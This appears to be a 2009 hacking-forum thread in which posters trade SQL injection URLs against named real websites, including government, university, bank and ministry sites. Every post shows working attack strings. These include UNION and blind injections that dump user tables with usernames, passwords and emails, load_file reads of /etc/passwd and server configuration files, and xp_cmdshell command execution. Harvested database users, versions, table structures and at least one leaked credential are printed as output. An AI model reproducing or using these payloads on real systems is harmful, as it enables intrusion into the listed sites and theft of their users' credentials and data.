stoneast@localhost:stoneast:5.0.77
http://www.stoneast.com/php/design/design.php?id=-2+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21--
jnoa@gatorade.dreamhost.com:jnoa_index:5.0.67-userstats-log
http://jeremynoa.com/site/design.php?id=-17+union+select+1,2,3,4,concat_ws(0x3a,user(),data base(),version()),6,7--
http://forums.patchtimer.org/mobile/thread.php?id=-8517+union+select+1,concat_ws(char(32,58,32),user( ),database(),version())--&forum=6&start=20
joshscho_jschoof@localhost : joshscho_ptforums : 5.0.81-community-log
http://forums.patchtimer.org/mobile/thread.php?id=-8517+union+select+1,concat_ws(char(32,58,32),user_ group,user_name,user_password)+from+joshscho_coppe rmine.schoof_users--&forum=6&start=20
http://forums.patchtimer.org/mobile/thread.php?id=-8517+union+select+1,concat_ws(char(32,58,32),user_ group,user_name,user_password)+from+joshscho_duag. cpg14x_users--&forum=6&start=20
http://forums.patchtimer.org/mobile/thread.php?id=-8517+union+select+1,concat_ws(char(32,58,32),usern ame,user_password,user_level)+from+joshscho_hhguil d.phpbb_users--&forum=6&start=20
P.S. I liked the humor; instead of Page 404: "This page has been viewed 1,185,131 times. Why we will never know."
Visibledust.com pr5
VisibleDust is the renowned producer of high quality DSLR cleaning products, especially tailored for the digital sensor.
http://www.visibledust.com/products3.php?pid=-3'+union+select+null,null,null,null,null,null,conc at_ws(char(32,124,32),version(),user(),database()) ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null+--+
http://www.visibledust.com/products3.php?pid=-3'+union+select+null,null,null,null,null,null,conc at_ws(char(32,124,32),name,address,city,province,c ountry,postal,telephone,fax,email,website),null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null+from+visibled_cart.distributors+limit +0,1+--+5.0.67-log | visibled_9@localhost | visibled_cart
http://www.most.zp.ua/history/index.php?id_article=31+UNION+SELECT+1,2,3,4,5,6,7 ,8,9+LIMIT+1,1
Database Version: 4.1.22-log
Database name: most
User name: most@beta
http://www.kanatka.crimea.ua/article/index.php?id_article=9+UNION+SELECT+1,2,3,4,5,6,7, 8,9+LIMIT+1,1
Database Version: 5.0.81-community
Database name: kanatka_base
User name: kanatka_user@localhost
http://www.sevhwarang.com.ua/article/index.php?id_article=2+UNION+SELECT+1,2,3,4,5,6,7, 8,9+LIMIT+1,1
Database Version: 4.1.22-log
Database name: sevhwarang
User name: u_sevhwarang@localhost
DezMond™
14.10.2009, 00:54
http://www.4justice.info/shownews.php?id=-4+union+select+1,2,3,4+from+mysql.user+--+
http://www.ffbg.hartberg.info/shownews.php?id=-17+union+select+1,user,3,4,5+from+users+/*+
http://www.parssupporterstrust.co.uk/index.php?ID=-1932'+uNiOn+sElEct+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34+--+&CATEGORY2=3-News
http://www.opera-rennes.fr/index.php?id=2796&theme=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws( 0x3a3a,tstamp,username,password,admin),13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49, 50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 ,67,68,69+from+be_users+/*+
http://www.lampire.com/news/article.php?news_id=-000000017'+union+select+1,2,3,4,concat_ws(0x3a3a,u ser_email,user_pw),6,7+from+Users+limit+1,1+--+
http://www.unlockmorerock.com/news-article.php?news_id=-4'+union+select+1,2,3,concat_ws(0x3a3a,username,pa ssword,email),5,6,7+from+rock_users+/*+
http://kennyloggins.com/news-article.php?news_id=-12'+union+select+1,2,3,4,5,6+/*+
http://www.dckconcessions.com/news/article.php?news_id=-27'+union+select+1,username,3,4,5,6+from+user+--+
http://www.aaronhifi.com/news-article.php?news_id=-8+uNiOn+sElEct+1,group_concat(tAble_Name),3,4,5+fr om+information_schema.tables+--+
http://www.namcnevada.com/news/article.php?news_id=-47+union+select+1,2,3,4,5,6,7,8,9+/*+
http://www.thaidye.com/showall.php?ID=-1+union+select+1,database%28%29,version%28%29,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18--
thaidye_items
5.0.67-community
wishing everyone big money
4.1.25-Debian_mt1
http://www.fisticuffdesign.com/portfolio.php?id=-9+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15--
5.0.81-community
http://www.landmarkarchitects.net/portfolio.php?id=-1+union+select+1,2,3,4,version(),6--
4.1.22-max-log
http://www.exemplarindia.net/portfolio.php?id=-31+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16--
5.0.81-community-log
http://www.jcinteractive.net/portfolio.php?id=-3+union+select+1,2,3,4,5,6,version(),8--
5.0.75
http://chomis.net/portfolio.php?id=-48+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--
4.1.25-Debian_mt1
http://studiogreen.net/portfolio.php?id=-8+union+select+1,version(),3,4,5,6,7,8,9,10--
4.1.22-standard
http://www.kwakk.com/portfolio.php?id=-8+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14--
ILYAtirtir
14.10.2009, 14:50
Kazan State Medical University. Web portal of the research department.
http://ajp.infomed.su/med_info/profile/nirdetail.jsp?id=-27+union+select+1,concat_ws(0x3a,database(),user() ,version()),3,4,5,6,7,8,9
med_info:root@127.0.0.1:5.0.45
http://www.niigb.ru/?id=-17+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6/*
4.1.25-log:niigb@localhost:wwwniigbru_cmsmy_niigb
everything is on the site
http://www.coshuk.com/html/images.php?id=-38+union+select+1,concat_ws(0x3a,id,loginname,name lc,email,created,modifiedby,password,passwordchang ed,superuser,disabled),3,4,5,6,7,8,9,10,11,12,13+f rom+phplist_admin--
[x60]unu
14.10.2009, 23:38
http://www.eumetech.com/l.php?id=1+anD+1=8%20+uniON+all+seLEcT+login+from+ users/*
http://www.trends-in-newsrooms.org/articles.php?id=-20+union+all+select+load_file('/etc/passwd'),2,3,4,5,6,7--
http://www.trends-in-newsrooms.org/articles.php?id=-20+union+all+select+load_file('/etc/php5/apache2/php.ini'),2,3,4,5,6,7--
http://www.nchla.org/actiondisplay.asp?ID=2 or 2=@@version
Version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 1)
And also some Microsoft JET Database ones:
I googled something about Jet Database; this is roughly how it should be done.
http://www.agenceglobal.com/article.asp?id=10+UNION+exec+master..xp_cmdshell+' dir'
http://www.thetruthseeker.co.uk/article.asp?ID=10+UNION+exec+master..xp_cmdshell+' dir'
http://faganmedia.com/profile.php?id='+UNION+SELECT+1,2,3,4,5,load_file( '/etc/passwd'),7,8,9--+
http://www.ilpkl.gov.my/alumni/dataDetail.php?recordID=-20+union+all+select+1,2,load_file('/etc/passwd'),user(),version(),6,7,concat(user,0x3a,pas sword),9,10+from+mysql.user--
http://www.ilpkl.gov.my/alumni/dataDetail.php?recordID=-20+union+all+select+1,2,load_file('/etc/httpd/conf/httpd.conf'),4,5,6,7,8,9,10--
http://www.ilpkl.gov.my/alumni/dataDetail.php?recordID=-20+union+all+select+1,2,load_file('/etc/httpd/php.ini'),4,5,6,7,8,9,10--
root@localhost, 5.0.37
crunch
http://njiiahc.rutgers.edu/LessonPlans/index.php?cn=-9+union+select+1,username,password,4,5,6,7,8,9+fro m+db_user/*
HAXTA4OK
15.10.2009, 16:14
TIC: 20
PR: 4
http://www.daedalic.de/index.php?modus=-news'+union+select+1,2,3,4,concat_Ws(0x3a,user(),d atabase(),version()),6,7,8,9,10+--+&lang=en
U281335@gosbar.store:DB281335:5.0.67-log
ILYAtirtir
15.10.2009, 21:03
Ministry of Transport of the Russian Federation
http://www.mintrans.ru/menu/menu.aspx?lvl=2&fl=0&prt=35+union+select+1,@@version,3,4+from+presspage
Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
Nov 24 2008 13:01:59
Copyright (c) 1988-2005 Microsoft Corporation
Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Hack_ERR++
15.10.2009, 22:04
http://www.findsubtitles.com/latest.php?page=-864+union+select+1,2,version(),4--
5.0.81-community-log
http://www.traubfuneralhome.com/display.php?id=1876+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16
Database Version: 5.0.45-community-nt
Database name: traubdata
User name: traubdata@localhost
24 :In database traubdata found table users
1 : user_id
2 : user_name
3 : user_password
whoever finds the admin panel, message me privately
navigat0r
15.10.2009, 23:49
http://love-gorod.com/index.php?anketa=58+UNION+SELECT+AES_DECRYPT(AES_E NCRYPT(CONCAT(0x7873716C696E6A626567696E,Version() ,0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716 C696E6A656E64),0x71),0x71),2,3,4,5,6,7,8,9,10,11--
Database Version: 5.0.67-community
Database name: admin_love
User name: admin_love@localhost
http://www.office-direct.biz/news/id52+UNION+SELECT+1,version%28%29,3,4,5,6,7+LIMIT+ 1,1--
Database Version: 5.0.45-log
Database name: ofdir
User name: ofdir@localhost
http://www.conab.gov.br/conabweb/index.php?PAG=1+and+1=cast((select+version()||chr( 58)||user)||chr(58)||current_database()+as+int)
PostgreSQL 8.2.9 on x86_64-unknown-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21):conabweb:bd_conabweb
Gameguru Mania
root@localhost : box : 5.0.32-Debian_7etch8-log
http://www.ggmania.com/cheatprint.php3?cheat=0+union+all+select+1,CONCAT_ WS(0x203a20,user(),database(),version()),3,CONCAT_ WS(0x203a20,user,password),5+from+mysql.user/*
http://www.ggmania.com/cheatprint.php3?cheat=0+union+all+select+1,load_fi le(0x2F6574632F706173737764),3,4,5/*
hack-win32
16.10.2009, 11:01
redboss@localhost:mobilegamesdb_com:5.0.51a-24+lenny1-log
http://www.mobilegamesdb.com/game.php?id=-369+union+select+concat_ws(0x3a,user(),database(), version()),2,3,4,5,6,7--
http://isic-lipetsk.ru/?com=cat&id=-19+union+select+concat_ws(char(58,58),user(),datab ase(),%20version())--
isiclipe@fe9.hc.ru::wwwisiclipetskru::4.1.25-log
http://www.ctyfc.co.uk/team.php?id=-8+union+select+concat_ws(char(58,58),user(),databa se(),version()),2,3/*
uk2camberlecouk22457_1@superultra6.uk2.net::uk2cam berlecouk22457_1::4.0.24-log
MTV.co.kr pr5
MTV Korea :)
http://www.mtv.co.kr/tv/truemusiclive/content.php?pid=85+and+substring(version(),1,1)=5+--+mysql: 5.0.51a-3ubuntu5.4-log
database(): mtv4
user(): mtvkor@www
Procredit bank
http://www.procreditbank.ro/hr_job_details.php?id=31+and+substring(@@version,1 ,1)=5
Official international fan club of Ruslana
http://fanclub.ruslana.ua/ru/national.php?country=-65%20union%20select%20username%20FROM%20admins
http://fanclub.ruslana.ua/ru/national.php?country=-65%20union%20select%20username%20FROM%20users
http://fanclub.ruslana.ua/myadmin/
Version 5.0.86
66 fields, brutal
http://www.pxel.ru/index.php?d=b&iduni=-15541+union+select+1,concat_ws(char(58,58),user(), database(),version()),3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66--&from=ya
pxel@box.hc.ru::wwwpxelru::4.0.26
TIC 60 PR 4
nemaniak
16.10.2009, 20:22
springhousecaravanpark.co.uk PR-3
http://www.springhousecaravanpark.co.uk/detail.php?id=104+union+select+1,concat_ws(0x3a,ve rsion(),user(),database()),3,4,5,6,7+--+
5.0.45:bluesky@server213-171-218-146.livedns.org.uk:blueskyresorts
heathergate.co.uk PR-3
http://www.heathergate.co.uk/detail.php?id=132+union+select+1,concat_ws(0x3a,ve rsion(),user(),database()),3,4,5,6,7+--+
5.0.45:bluesky@server213-171-218-146.livedns.org.uk:blueskyresorts
eyecandy-promo.co.uk PR-2
http://www.eyecandy-promo.co.uk/page.php?p=1+union+select+1,2,3,4,5,6,7,8,9,10,11, 12,13,concat_ws(0x3a,version(),user(),database())+--+
Look in the page source, in the body tag, the id parameter
layout_5.0.77:ecdbadmin@server213-171-218-146.livedns.org.uk:icandydb
ILYAtirtir
17.10.2009, 01:13
Comision Federal de Mejora Regulatoria
http://www.cofemer.gob.mx/historial.asp?menu_id=(select+@@version)
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
4.1.12:admin@localhost
http://www.dwarvenforge.com/store/product.php?productid=16387)+union+select+concat_w s(0x203a20,host,user,password,file_priv),2+from+my sql.user/*
http://www.dwarvenforge.com/store/product.php?productid=16387)+union+select+load_fil e(0x2f6574632f706173737764),2/*
web@cgi31-ch.uk.clara.net : 5.0.18-nt
http://www.salmondevelopments.com/news.php?id=-999+union+all+select+1,unhex(hex(concat_ws(0x203a2 0,user(),version()))),3--
http://bigchina.ru/catalog/exhibitions/?cat=-311+union+select+1,concat_ws(char(58,58),user(),da tabase(),version()),3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17--
bigching_s@localhost::bigching_bigching::4.1.25-log
TIC 50 PR 3
nemaniak
17.10.2009, 12:15
knittingtradejournal.com PR-3
http://www.knittingtradejournal.com/news_details.php?id=-1173+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9+--+
5.0.45-community-log:ktjadmin@server213-171-218-146.livedns.org.uk:knittingtradejournal
imatek.co.uk PR-3 blind
http://www.imatek.co.uk/news-item.php?id=5+and+1=IF(ASCII(SUBSTRING((SELECT+ver sion()),1,1))=53,1,0)
version: 5.0.45
user: cmsimatek@server213-171-218-146.livedns.org.uk
database: cmsimatek
Columns of the cms_users table
access
avatar
email
fullname
id
lastlogin
lastloginstatus
password
username
users
beeliefbotanics.com PR-4 pharma
http://www.beeliefbotanics.com/news.php?articleref=15+union+select+1,2,concat_ws( 0x3a,version(),user(),database()),4,5,6+--+
5.0.45-log:beeliefbot1@213.171.218.146:beeliefbot1
http://www.chestisvet.ru/index.php4?id=25&otv=-366+union+select+concat_ws(0x3a,version(),database (),user())+--+
Version: 4.1.22-standard-log
database: chestisv_klub
User: chestisv_klub@localhost
http://www.planeta-sirius.ru/index.php?p=11&kod=-14+union+select+concat_ws(char(58,58),user(),datab ase(),version()),2,3--
weber@10.0.1.206::weber::4.1.22-log
TIC 170 PR 4
Sybase ASE
http://www.inthebreeze.com/index.php?action=Products&rowid=manufacturer&manuid=1+and+1=convert(integer,(select+@@version))
Adaptive Server Enterprise/11.9.2.3/1159/P/SWR 9223 ESD 3/Linux Intel/Linux 2.2.5-15 i586/OPT/Tue Sep 5 06:37:26 2000
DezMond™
17.10.2009, 18:04
http://www.nlwaterpolo.nl/history/index.php?id=-40+union+select+database()+--+&pid=6
nlwaterpolo_nl_-_db
http://www.fwrema.ch/history/index.php?page=040000&id=-195+union+select+1,2,3,4,5,6+/*+&pics=history/1990/Reglement_Rettungsdienst
http://www.hooplife.ca/viewArticle.php?id=-327+union+select+1,concat_Ws(0x3a3a,ID,user,pass,t hegroup),3,4,5,6,7+from+cmsusers+--+
http://www.stevaroshop.nl/showall.php?id=-67+union+select+1,2,3,4,5,6+--+
http://www.ramcc.org/showall.php?id=-136+union+select+1,2,concat_ws(0x3a3a,nombre,pass) ,4,5,6,7,8,9,10,11+from+usuarios+limit+1,1+--+
hack-win32
17.10.2009, 18:28
pacmate_stfr1@localhost:pacmate_stfr1:5.0.85-community
http://www.pacmategear.com/user.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9,10,11--
geogoing@localhost:geogoing:5.1.39
http://www.geogoing.com/user.php?id=-45+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5--
u70694110@cgihost:d60627246:5.0.77-log
http://www.fairnessforfarmers.ca/news_one.php?id=-13+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version())--
nrskf1@121.52.209.130:nrskf1:5.0.40-log
http://www.skf1.cn/news_one.php?id=-23+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3,4,5--
cpobg_krindo@localhost:cpobg_krindo:5.0.81-community-log
http://www.cpo-bg.com/news_one.php?id=-4+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6--
http://www.premer-mebel.ru/shop/?dir=-1+union+select+1,concat_ws(char(58,58),user(),data base(),version()),3,4,5,6,7,8--&pid=34
premermebel@localhost::db_premermebel::5.0.51a-community
Columns in the pm_fsadmins table
login
password
admin
vis
superadmin
fsmain
fsusers
zari1_ph@localhost : 4.1.14
http://www.megaworldmakati.com/payment.php?id=-3+union+select+1,concat_ws(0x203a20,user(),version ()),3,4,null,6,7,8,9,10+from+mysql.user--
4.1.22-standard-log : root@localhost
http://www.santaluciahighlands.com/profile.php?id=-1+union+all+select+1,concat_ws(0x203a20,version(), user(),host,user,password,file_priv),3,4,5,6,7,8,9 ,10,11,12,13,14,15+from+mysql.user
http://www.santaluciahighlands.com/profile.php?id=-1+union+all+select+1,load_file(0x2f6574632f7061737 37764),3,4,5,6,7,8,9,10,11,12,13,14,15--
Ministryofrum.com pr5
Ministry of Rum.
http://www.ministryofrum.com/rumdetails.php?r=500+and+substring(version(),1,1)= 4+--+
nemaniak
17.10.2009, 21:53
raidiofailte.com PR-6
http://www.raidiofailte.com/homepage_article.php?ID=-5+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database())+--+
5.0.45:rfdbsys@server213-171-218-146.livedns.org.uk:raidiofailtedb1
conservatoryoutlet.co.uk PR-4
http://www.conservatoryoutlet.co.uk/offers.php?id=336+union+select+concat_ws(0x3a,vers ion(),user(),database())+--+
5.0.45:motConOut08@server213-171-218-146.livedns.org.uk:conOutlet
http://www.unitoys.ru/index.php?r=3&man=25&l=-0+union+select+concat_ws(char(58,58),user(),databa se(),version())--
u76467@10.10.153.174::u76467::5.0.67-log
TIC 30 PR 3
http://svetlinz.ru/?idp=15&idn=2&ids=9&idt=-28+union+select+1,2,3,concat_ws(char(58,58),user() ,database(),version()),5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40--
svetli01@localhost::wwwsvetlinzru::4.1.25-log
TIC 10 PR 2
http://babylonia.ucsd.edu/views.php?id=6+and+1=0+union+select+1,2,3--
FC Obolon fan club 4.0.27
http://www.ole.obolon.ua/index.php?id=-431%20union%20select%201,2,3,4,5,6,7,login,9,passw ord,11,12%20from%20user%20limit%2020,1/*
Vestnik Kipra newspaper 5.0.32-Debian_7etch1~bpo.1-log
http://www.cyprusadvertiser.com/misc.php?id=-30%27union%20select%201,2,login,pass%20FROM%20admi n/*
5.0.81-community-log
http://encycl.anthropology.ru/article.php?id=1%20union%20select%201,usr_login,us r_pass,4,5,6,7,8,9,10%20FROM%20user%20limit%201,1% 20--
http://anthropology.ru:2082/
Strategic Culture Foundation 5.0.67-log
http://fondsk.ru/article.php?id=-1527%20union%20select%201,2,3,4,5,group_concat%28C OLUMN_NAME+separator+0x0a%29,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20 FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_ NAME=0x706572736F6E%20--
Shell-Shocked 4.1.22-standard
http://shell-shocked.org/article.php?id=-284%27%20union%20select%201,2,version%28%29,4,5,6, 7,8,9,10,11%20from%20admin/*
Some music festival 4.1.22
http://www.krainamriy.com/news.php?id=-88%20union%20select%201,version%28%29,3,4,5,6,7,8, 9,10,11%20--
ILYAtirtir
18.10.2009, 05:55
Arthouse
Founded in 1996 by the private Swedish company Maywin Media AB, "Кино без границ" ("Cinema Without Borders") is the first film distribution company in Russia specializing in art-house cinema.
TIC: 1400
PR: 5
MsAccess
http://www.arthouse.ru/movie.asp?Code=TERADVOC'+union+select+111,name%2B' :'%2bpassword,3,4+from+users
Алексей Ушаков:ddZMOspg
European Forum For Good Clinical Practice
MsAccess
http://www.efgcp.be/Conference_details.asp?id=242+union+select+null,pa ss,null,44444,null,null,null,null,null,null,null,n ull+from+members+where+id=33&L1=10&L2=1&TimeRef=1
227771
http://www.vollversion.de/download/programmtitel.php4?id=-1418+union+select+concat_ws(0x3a,user(),database() ,version())+--+
User: vollversion@localhost
Database: vollversion
Version: 5.0.42
http://www.feldgrau.com/articles.php?ID=-67+union+select+1,2,3,4,5,6,table_name,null+from+i nformation_schema.tables+limit+1,200/*
I think everyone knows what to do from here
Old news. Already posted.
http://www.cmc.dk/uk_udgivelse.php4?id=-453+union+select+concat_ws(0x3a,user(),database(), version()),2+--+
User: cmcdk2@light.securehosting.dk
Database: cmcdk2
Version: 4.0.24-log
Viana.es.gov.br pr3
Prefeitura Municipal de Viana.
http://www.viana.es.gov.br/site/index.php?target=noticia_leitura&nid=1+and+1=cast((select+chr(126)||chr(32)||curren t_database()||chr(32)||chr(124)||chr(32)||user||ch r(32)||chr(124)||chr(32)||version()||chr(32)||chr( 126))+as+int)~ viana | viana | PostgreSQL 8.4.1 on x86_64-pc-linux-gnu, compiled by GCC x86_64-pc-linux-gnu-gcc (GCC) 4.1.2 (Gentoo 4.1.2 p1.0.2), 64-bit ~
traintheater_db@localhost : 5.0.45
http://www.traintheater.co.il/show.php?id=-14+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x203a 20,user(),version()),11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39--
4.0.26-log : winar@222.124.162.139
http://sekolah-kita.net/info.php?aksi=detail&iden=-12+union+all+select+1,2,3,concat_ws(0x203a20,versi on(),user(),host,user,password,file_priv),5,6,7,8, 9,10+from+mysql.user--
http://sekolah-kita.net/info.php?aksi=detail&iden=-12+union+all+select+1,2,3,load_file(0x2F6574632F70 6173737764),5,6,7,8,9,10--
session is accessible
http://afisha.vokrug.by/kino/?type=kt&kt_id=-10+union+select+1,2,3,concat_ws(char(58,58),user() ,database(),version())--
vokrugb_portal@localhost::vokrugb_portal::5.0.81-community
PR 3
PR3
http://la-femme.net/index.php?cat=%27+union+select+1,version%28%29+--+-
Database version:5.0.26-log;
Output goes into the title.
Samurai weapons shop 5.0.45
http://www.kitana.ru/razdel.php?id=-1%20union%20select%201,login,3,psw%20FROM%20person al
Kyiv International Institute of Sociology. 5.1.38-log.
http://www.kiis.com.ua/index.php?id=6&sp=1%20union%20select%201,2,3,4,COLUMN_NAME,6,7,8, 9%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TA BLE_NAME=0x61646D696E%20--
[underwater]
18.10.2009, 19:57
http://www.maptrade.org/events/displayevent.php?id=-94+union+all+select+1,2,3,4,5,6,@@version,8,9,10,1 1,12--
Tables:
http://www.maptrade.org/events/displayevent.php?id=-94+union+all+select+1,2,3,4,5,6,group_concat(table _name),8,9,10,11,12+from+information_schema.tables +where+table_schema=database()--
Columns:
http://www.maptrade.org/events/displayevent.php?id=-94+union+all+select+1,2,3,4,5,6,group_concat(colum n_name),8,9,10,11,12+from+information_schema.colum ns+where+table_schema=database()--
Users:
http://www.maptrade.org/events/displayevent.php?id=-94+union+all+select+1,2,3,4,5,6,group_concat(Admin User_ID,0x3a,username,0x3a,password),8,9,10,11,12+ from%20admin--
http://www.scorcher.ru/idea_gallery/gallery_show.php?id=-47+union+select+1,2,3,4,5,6,version(),user(),9,10, 11,12,13,14,15
5.0.45-logscorcher0@localhost
PS. About 750 tables.
http://www.town.donetsk.ua/catalog/?s=-198+union+select+1,concat_ws(char(58,58),user(),da tabase(),version()),3--
u_town9a@localhost::town9a::5.0.44-log
TIC 40 PR 3
There are a great many tables and columns; there is a phpbb forum database, which is currently not working on the site.
continuing http://www.specialtycareinc.com/doctors/department.php?id=-2+union+select+1,2,3
5.0.85-community
s0l_ir0n
19.10.2009, 13:05
Login:
http://www.sos-kazakhstan.kz/index.php?n=50+UNION+SELECT+1,2,3,4,5,6,login,8,9+ FROM+_users+LIMIT+0,1+--
Password:
http://www.sos-kazakhstan.kz/index.php?n=50+UNION+SELECT+1,2,3,4,5,6,pwd,8,9+FR OM+_users+LIMIT+0,1+--
s0l_ir0n
19.10.2009, 14:51
http://www2.parquebiologico.pt/doc.php?id=-1+UNION+SELECT+1,2,concat(username,char(58),passwo rd,char(58),email),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33+FROM+tbl_users+LIMIT+0,1+--
http://www.armes-deutschland.org/artikel.php4?artikel=-543+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (0x3a,user(),database(),version()),13,14,15,16+--+&PHPSESSID=61fd2854f842696259918ce.
User: ftp16866@bender.webpack.hosteurope.de
Database: netzmuetze_de_2
Version: 5.0.32-Debian_7etch1~bpo.1-log
http://buddha.ru/news_one.php?id=-82+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9--
user - [welcomeb_drup@v7.valuehost.ru]
database - [welcomeb_drup]
version - [4.0.27-log]
-----------
http://quality.ulstu.ru/index_base.php?adr=news/news_one.php&id=-34+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version())--
user - [quality@mercury.ulstu.ru]
database - [quality_ulstu_ru]
version - [4.1.25-log]
-----------
http://milam.com.ua/news/news_one.php?id=-9+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8--
user - [h01008_milam@localhost]
database - [h01008_milam]
version - [5.0.81-community]
Tables
http://milam.com.ua/news/news_one.php?id=-9+union+select+1,TABLE_NAME,3,4,5,6,7,8+from+INFOR MATION_SCHEMA.TABLES+limit+20,1--
-----------
http://www.softplasma-server.info/ar/news_one.php?id=-509+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6--
user - [softpl89_yasser@localhost]
database - [softpl89_gcapital]
version - [5.0.81-community]
BR selection, sites with identical design, PR 3:
http://www.guiabebedouro.com.br/detalhe_empresa.php?id_empresa=-736+union+select+1,2,3,4,concat_ws(char(58,58),use r(),database(),version()),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52--
@localhost::guiabebe_guiabeb::5.0.81-community
http://www.portalguiaribeirao.com.br/detalhe_empresa.php?id_empresa=-147+union+select+1,2,3,4,concat_ws(char(58,58),use r(),database(),version()),6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 ,49,50,51,52--
@localhost::portal_guiaribeirao::5.0.81-community
DezMond™
19.10.2009, 23:26
http://pomservicealimentaire.ca/lang/fr/product.php?productID=-127+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+inf ormation_schema.tables+--+®ionID=QC
http://www.gammereunir.fr/product.php?productid=-38+union+select+1,2,3+from+information_schema.tabl es+--+
http://generation-artisans.fr/view-article.php?idarticle=-2+union+select+1,2,3,4,5+from+ga_clients+/*+
http://nhaantoan.com/index.php?page=tintuc&code=tkm&id=-201+union+select+unhex(hex(concat_ws(0x3a3a,id_dan hmuc,username,password,level))),2,3,4,5,6+from+gws _admin+--+
web@cgi31-ch.uk.clara.net : 5.0.18-nt
http://partydigest.com/news_detail.php?nid=-49+union+select+1,2,3,concat_ws(0x203a20,version() ,user()),5,6,7,8,9,10,11,12
4.1.14-log : bookmarks@localhost
http://www.winthernet.dk/bookmarks/view_group.php?id=-55+union+select+1,2,unhex(hex(concat_ws(0x203a20,v ersion(),user(),host,user,password,file_priv))),4, 5,6,7,8+from+mysql.user--
ILYAtirtir
20.10.2009, 04:49
http://www.goszakaz.inconnect.ru/images/Logo_Gosz_2010.jpg
http://www.goszakaz.inconnect.ru/?id=10001&n=-3365+union+select+1,2,3,concat_ws(0x3a,databas
e(),user(),version()),5,6
goszakaz@vh1.cetis.ru:5.0.67-community-nt
http://www.rpgboard.de/showmember.php4?id=-63471+union+select+1,2,concat_ws(0x3a,user(),datab ase(),version()),4,5,6,7,8,9,10+--+&lvis=
User: rpgboard@localhost
Database: rpgboard
Version: 5.0.26-log
s0l_ir0n
20.10.2009, 07:36
They sell honey...
http://www.apishop.ru/good.php?id=1+union+select+1,ConCat(email,Char(58) ,password),3,4,5,6,7,8+FROM+prgp_user+LIMIT+0,1+--
Did not find a login form
http://smallbusinessohs.com.au/register.php?id=-1+union+select+1,ConCat(username,Char(58),password )+FROM+users+LIMIT+0,1+--
Some magazines:
http://www.lcoastpress.com/book.php?id=1 union select 1,ConCat(username,Char(58),password),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 FROM user LIMIT 0,1 --
Video clips:
http://mytytv.com/flv/mp3.php?id=-1%20union%20select%201,2,3,concat_ws%280x3a,user%2 8%29,database%28%29,version%28%29%29,5,6,7,8,9,10, 11,12,13,14,15%20--
User:mytytv1@localhost
Database:mytytv1
Version:5.0.24
Media:
http://giaitri.com/new/mp3.php?id=-1%20union%20select%201,2,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22%20--
User:lmvn@192.168.1.106
Database:news
Version:5.0.22-log
Student site:
